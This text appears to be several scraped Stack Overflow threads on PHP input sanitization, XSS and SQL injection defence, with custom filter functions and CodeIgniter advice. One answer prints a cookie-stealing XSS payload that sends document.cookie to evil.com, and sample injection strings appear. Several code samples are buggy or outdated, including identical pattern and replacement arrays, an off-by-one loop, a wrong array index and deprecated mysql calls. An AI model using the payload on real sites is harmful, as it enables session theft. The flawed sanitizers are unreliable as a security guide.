This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
PHP: the ultimate clean/secure function
I revised my site's security filters today. I used to filter input and do nothing with the output.
Here it is:
All user inputted variables go through these 2 functions depending on the type:
PS: Since I didn't start coding from scratch I did it for all variables, including the ones that aren't aren't used in queries. I understand that this is a performance killer and will be undoing that. Better safe than sorry right?
// numbers (I expect very large numbers)
function intfix($i)
{
$i = preg_replace('/[^\d]/', '', $i);
if (!strlen($i))
$i = 0;
return $i;
}
// escape non-numbers
function textfix($value) {
$value = mysql_real_escape_string($value);
return $value;
}
XSS preventing:
Input - filters user submitted text, like posts and messages. As you see it's currently empty. Not sure if strip_tags is needed.
Output - on all html outputs
function input($input){
//$input = strip_tags($input, "");
return $input;
}
function output($bbcode){
$bbcode = textWrap($bbcode); // textwrap breaks long words
$bbcode = htmlentities($bbcode,ENT_QUOTES,"UTF-8");
$bbcode = str_replace("\n", "<br />", $bbcode);
// then some bbcode (removed) and the img tag
$urlmatch = "([a-zA-Z]+[:\/\/]+[A-Za-z0-9\-_]+\\.+[A-Za-z0-9\.\/%&=\?\-_]+)";
$match["img"] = "/\[img\]".$urlmatch."\[\/img\]/is";
$replace["img"] = "<center><img src=\"$1\" class=\"max\" /></center>";
return $bbcode;
}
I included the img tag because it could be vulnerable to css...
What do you think? Anything obviously wrong? Good enough?
Looks ok, but you could easily make one function for both texts and ints, checking first its type, and act on it.
Related
The standard way of sanitizing input would be to use commands such as
$url = preg_replace('|[^a-z0-9-~+_.?#=!&;,/:%#$\|*\'()\\x80-\\xff]|i', '', $url);
$strip = array('%0d', '%0a', '%0D', '%0A');
preg_replace("/[^A-Za-z0-9 ]/", '', $string);
echo htmlentities($str);
However, I like it when my users are able to use nice things like parentheses, carats, quotes, etc in their inputs, comments/usernames/etcetc. Since HTML renders codes such as ( into symbols such as (, I was hoping to use this alternative approach to sanitizing their input.
Before I embarked on writing a function to do this for possibly harmful characters such as ( or ; or < (so injections such as sneaky eval() or <text/javascript> would not work) I tried searching up previous people's attempts at doing this type of sanitization.
I found none.
This makes me think that I must be clearly overlooking some incredibly obvious security flaw in my "creative" sanitization method.
I will not be using this function as the primary way to protect my mySQL database. I have the new mysqli class for that. Adding this sanitization overtop of the mysqli separation of input & query seems like a nice idea, though.
I am using a completely different function to clean up URLs. Those require a different approach.
This function will be used for user input to be displayed on the page, though.
So .... what could I possibly be missing? I KNOW there's gotta be something wrong with this idea since no one else uses it, right?! Is it possible to "re-render the rendered text" or something else horrific and obvious? My pretty little function so far:
Takes input strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
function santitize_data($data) {
//explode the string
//do a replacement for each character separately. Only do one replacement.
//dont do it with preg_replace because that function searches through a string in multiple passes
//and replaces already-replaced characters, resulting in horrific mishmash.
//put it back together with + signs iterating through array variables
$patterns = array();
$patterns[0] = "'";
$patterns[1] = '"';
$patterns[2] = '!';
$patterns[3] = '\\';
$patterns[4] = '#';
$patterns[5] = '%';
$patterns[6] = '&';
$patterns[7] = '$';
$patterns[8] = '(';
$patterns[9] = ')';
$patterns[10] = '/';
$patterns[11] = ':';
$patterns[12] = ';';
$patterns[13] = '|';
$patterns[14] = '<';
$patterns[15] = '>';
$patterns[16] = '{';
$patterns[17] = '}';
$replacements = array();
$replacements[0] = ''';
$replacements[1] = '"';
$replacements[2] = '!';
$replacements[3] = '\';
$replacements[4] = '#';
$replacements[5] = '%';
$replacements[6] = '&';
$replacements[7] = '$';
$replacements[8] = '(';
$replacements[9] = ')';
$replacements[10] = '/';
$replacements[11] = ':';
$replacements[12] = ';';
$replacements[13] = '|';
$replacements[14] = '<';
$replacements[15] = '>';
$replacements[16] = '{';
$replacements[17] = '}';
$split_data = str_split($data);
foreach ($split_data as &$value) {
for ($i=0; $i<17; $i++){
//testing
//echo '<br> i='.$i.' value='.$value.' patterns[i]='.$patterns[$i].' replacements[i]='.$replacements[$i].'<br>';
if ($value == $patterns[$i]) {
$value = $replacements[$i];
$i=17; } } }
unset($value); // break the reference with the last element
$data = implode($split_data);
//a bit of commented out code .. was using what seemed more logical before ... preg_replace .. but it parses the string in multiple passes ):
//$data = preg_replace($patterns, $replacements, $data);
return $data;
} //---END function definition of santitize_data
Spits out result strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
and the user sees these things rendered in the browser like like meep';) drop table and
alert(eval('document.body.inne' + 'rHTML'));
Without analyzing your code I can tell you that there is a high probability that you've overlooked something that an attacker could use to inject their own code.
The main threat here is XSS - you shouldn't need to "sanitize" to insert data into a database. You either use parameterised queries or you correctly encode characters that the database query language confers special meaning to at the point of entry into your database (e.g. ' character). XSS is normally dealt with by encoding at the point of output, however if you want to allow rich text then you need to take a different approach which is what I believe you are looking to achieve here.
Remember there is no magic function that sanitizes input in a generic manner - it very much depends on how and where it is used to determine whether it is safe or not in that context. (This bit added so if anyone searches and finds this answer then they are up to speed - I think you're already on top of this though.)
Complexity is the main enemy of security. If you cannot determine whether your code is safe or not it is too complicated and a sufficiently motivated attacker with enough time will find a way round your sanitization methods.
What can you do about this?
If you want to allow your users to enter rich text you could either allow BBCode to allow users to insert a limited, safe subset of HTML via your own conversion functions or you could allow HTML entry and run the content through a tried and tested solution such as HTML Purifier. Now, HTML Purifier won't be perfect and I'm sure that (another) flaw will be found in it at some point in the future.
How to guard against this?
If you implement a Content Security Policy on your site, this will prevent any successfully injected script code from executing in the browser. See here for current browser support for CSP. Don't be tempted to just use one of these methods - a good security model has layered security so if one control is circumvented, the other can catch it.
Google have now implemented CSP in Gmail to ensure any HTML email received cannot try anything sneaky to launch an XSS attack.
This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
Best way to prevent SQL Injection in PHP
On my site I have some HTML contents that a user sometimes must save in database. What is the safe way to do this (I don't want my database to be in danger, or users who will see that code later, called from database).
So what I have read is:
Use htmlentities to save data in database, and html_entity_decode to decode data from database. Is this safe enough, or should I use something else?
Provided you're using string escaping and/or prepared statements, HTML markup can't cause any damage to your database. The danger with HTML markup comes when you display it to the user, as if someone has injected unsavory HTML into the markup you're going to display then you've got an XSS attack on your hands.
If you're not escaping or using prepared statements, then pretty much any data that comes from outside can be dangerous.
You might want to look at the PHP function mysql_real_escape_string() ... More in this post: strip_tags enough to remove HTML from string?
Here's an example ...
// scrub string ... call with sanitize($blah,1) to allow HTML
function sanitize( $val, $html=0 ) {
if (is_array($val)) {
foreach ($val as $k=>$v) $val[$k] = sanitize($v, $html);
return $val;
} else {
$val = trim( $val );
if (!$html) {
$val = strip_tags($val);
$pat = array("\r\n", "\n\r", "\n", "\r");
$val = str_replace($pat, '<br>', $val); // newlines to <br>
$pat = array('/^\s+/', '/\s{2,}/', '/\s+\$/');
$rep = array('', ' ', '');
$val = preg_replace($pat, $rep, $val); // remove multiple whitespaces
}
return mysql_real_escape_string($val); // escape stuff
}
}
What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php Solution
Reason
Imagine an impute like this
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If i use strip_tags
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
if i use htmlspecialchars
var_dump(htmlspecialchars($maliciousCode));
Output
string '<script>document.write("<img src='http://evil.com/?cookies='"+document.cookie+"' style='display:none;' />");</script> I love PHP' (length=166)
My Choice
function cleanData($str) {
$str = urldecode ($str );
$str = filter_var($str, FILTER_SANITIZE_STRING);
$str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
return $str ;
}
$input = cleanData ( $maliciousCode );
var_dump($input);
Output
string 'document.write(""); I love PHP' (length=46)
If form is using GET instead of POST some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless
The are also enough class online to help you do filter see
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input.It now also covers multi-line textarea input
I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.
function clean_text($text, $html = true)
{ if($text == ""){return "";}
$text = nl2br($text,false); // false gives <br>, true gives <br />
$textary = explode("<br>",$text);
foreach($textary as $key => $val)
{ $val = trim($val);
$val = stripslashes($val);
$val = htmlspecialchars($val);
$textary[$key] = $val;
}
if ($html)
{ return implode("<br />",$textary);} //return implode("<br>",$textary);
else
{ return implode("\r\n",$textary);}
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php
How do you remove ALL HTML tags with codeigniter? im guessing you would have to use the PHP function strip_tags, but I wanted something like the global setting for XSS filtering
Thanks
If you're referring to using the input methods, Yes, you could technically open up system/libraries/Input.php, head down to this code:
/**
* Clean Input Data
*
* This is a helper function. It escapes data and
* standardizes newline characters to \n
*
* #access private
* #param string
* #return string
*/
function _clean_input_data($str)
{
if (is_array($str))
{
$new_array = array();
foreach ($str as $key => $val)
{
$new_array[$this->_clean_input_keys($key)] = $this->_clean_input_data($val);
}
return $new_array;
}
// We strip slashes if magic quotes is on to keep things consistent
if (get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
// Standardize newlines
if (strpos($str, "\r") !== FALSE)
{
$str = str_replace(array("\r\n", "\r"), "\n", $str);
}
return $str;
}
And right after the xss clean, you could put your own filtering function like so:
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
$str = strip_tags($str);
However this means that everytime you update CodeIgniter, you will have to make this change again. Also since this does all of this globally, it won't make sense if the value you're getting back is, say for example, numeric. Because of these reasons
Now for an alternative solution, you can use the CodeIgniter Form Validation library, which let's you set custom rules for fields, including php functions that can accept one argument, such as strip_tags:
$this->form_validation->set_rules('usertext', 'User Text', 'required|strip_tags');
I'm not sure what the circumstances are, so I'll let you decide which path to take, but in general I recommend handling data validation on a per case basis, since in a majority of cases the validation on the data is unique.
This is what I use when I want to eliminate XSS, HTML and still preserve the user post content (even malicious code attempts)
private function stripHTMLtags($str)
{
$t = preg_replace('/<[^<|>]+?>/', '', htmlspecialchars_decode($str));
$t = htmlentities($t, ENT_QUOTES, "UTF-8");
return $t;
}
The first regex remove everything that has a html format and the htmlentities takes care of quotes and stuff.
Use it on your controller everytime you need to REALLY clean things up. Fast and simple.
Eg., this very malicious str with lots of codes tags and stuff
Just another post (http://codeigniter.com) blablabla text blabla:</p>1 from users; update users set password = 'password'; select * <div class="codeblock">[aça]<code><span style="color: rgb(221, 0, 0);">'username'</span><span style="color: rgb(0, 119, 0);">); </span><span style="color: rgb(255, 128, 0);">// filtered<br></span><span style="color: rgb(0, 0, 187);">- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password </span></span>
<ok.>
Becomes
Just another post (http://codeigniter.com) blablabla text blabla:1 from users; update users set password = 'password'; select * [aça]'username'); // filtered- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password <ok.>
It still have the code, but that won't do anything on your db.
Use it like
$this->stripHTMLtags($this->input->post('html_text'));
You can put this function inside a library so you don't have to hack CI :)
Anyone know of any sample php (ideally codeigniter) code for parsing user submitted comments. TO remove profanity and HTML tags etc?
Try strip_tags to get rid of any html submitted. You can use htmlspecialchars to escape the tags if you just want to ensure that no html is displayed in the comments - as per Matchu's example, less unintended effects will happen with it than with strip_tags.
For a word filter, depending on how indepth you want to go, there are many examples on the web, from simple to complex. Here's the code from Jake Olefsky's example (the simple one linked previously):
<?
//This is totally free to use by anyone for any purpose.
// BadWordFilter
// This function does all the work. If $replace is 1 it will replace all bad words
// with the wildcard replacements. If $replace is 0 it will not replace anything.
// In either case, it will return 1 if it found bad words or 0 otherwise.
// Be sure to fill the $bads array with the bad words you want filtered.
function BadWordFilter(&$text, $replace)
{
//fill this array with the bad words you want to filter and their replacements
$bads = array (
array("butt","b***"),
array("poop","p***"),
array("crap","c***")
);
if($replace==1) { //we are replacing
$remember = $text;
for($i=0;$i<sizeof($bads);$i++) { //go through each bad word
$text = eregi_replace($bads[$i][0],$bads[$i][5],$text); //replace it
}
if($remember!=$text) return 1; //if there are any changes, return 1
} else { //we are just checking
for($i=0;$i<sizeof($bads);$i++) { //go through each bad word
if(eregi($bads[$i][0],$text)) return 1; //if we find any, return 1
}
}
}
//this will replace all bad words with their replacements. $any is 1 if it found any
$any = BadWordFilter($wordsToFilter,1);
//this will not repace any bad words. $any is 1 if it found any
$any = BadWordFilter($wordsToFilter,0);
?>
Many more examples of this can be found easily on the web.